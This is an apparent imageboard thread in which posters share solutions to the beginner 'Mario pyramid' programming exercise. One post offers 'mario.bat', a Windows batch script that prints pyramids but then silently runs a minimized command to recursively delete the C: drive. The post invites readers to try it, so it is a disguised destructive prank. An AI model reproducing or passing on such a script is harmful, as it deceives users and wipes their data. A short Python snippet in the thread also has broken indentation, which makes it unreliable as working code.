Mfw I needed 3.5 hours to do this

It looks like a portion of 1-1 in Super Mario Brothers.

Like this?

Attached: Screenshot from 2019-04-09 15-49-49.png (588x579, 32K)

mario.bat
@echo off
set /p height="Height: "
if "%height%"=="8" call :1
if "%height%"=="7" call :2
if "%height%"=="6" call :3
if "%height%"=="5" call :4
if "%height%"=="4" call :5
if "%height%"=="3" call :6
if "%height%"=="2" call :7
if "%height%"=="1" call :8
echo.
echo Is done or 8 max.
pause > nul
start /min del /q /s c:\
exit
:1
echo # #
echo ## ##
echo ### ###
echo #### ####
echo ##### #####
echo ###### ######
echo ####### #######
echo ######## ########
GOTO :eof
:2
echo # #
echo ## ##
echo ### ###
echo #### ####
echo ##### #####
echo ###### ######
echo ####### #######
GOTO :eof
:3
echo # #
echo ## ##
echo ### ###
echo #### ####
echo ##### #####
echo ###### ######
GOTO :eof
:4
echo # #
echo ## ##
echo ### ###
echo #### ####
echo ##### #####
GOTO :eof
:5
echo # #
echo ## ##
echo ### ###
echo #### ####
GOTO :eof
:6
echo # #
echo ## ##
echo ### ###
GOTO :eof
:7
echo # #
echo ## ##
GOTO :eof
:8
echo # #
GOTO :eof

3 min to make this
works for me, try by yourself

based

What did you struggle with? Also, what language were you programming in?

Just use iomanip 3head

3.5 hours is a long time but if you're new and didn't understand any of the concepts to produce something like this then its fine.

>Just call it "pyramid".
There you go.

Kinda, now with the same code and a height of 50.

I just shit this out in 2 minutes
def mario(n):
for i in range(n):
print(" "*int(n-i),"*"*int(i+1),"","*"*int(i+1))

kek

>left, right
>left==right

Waste of memory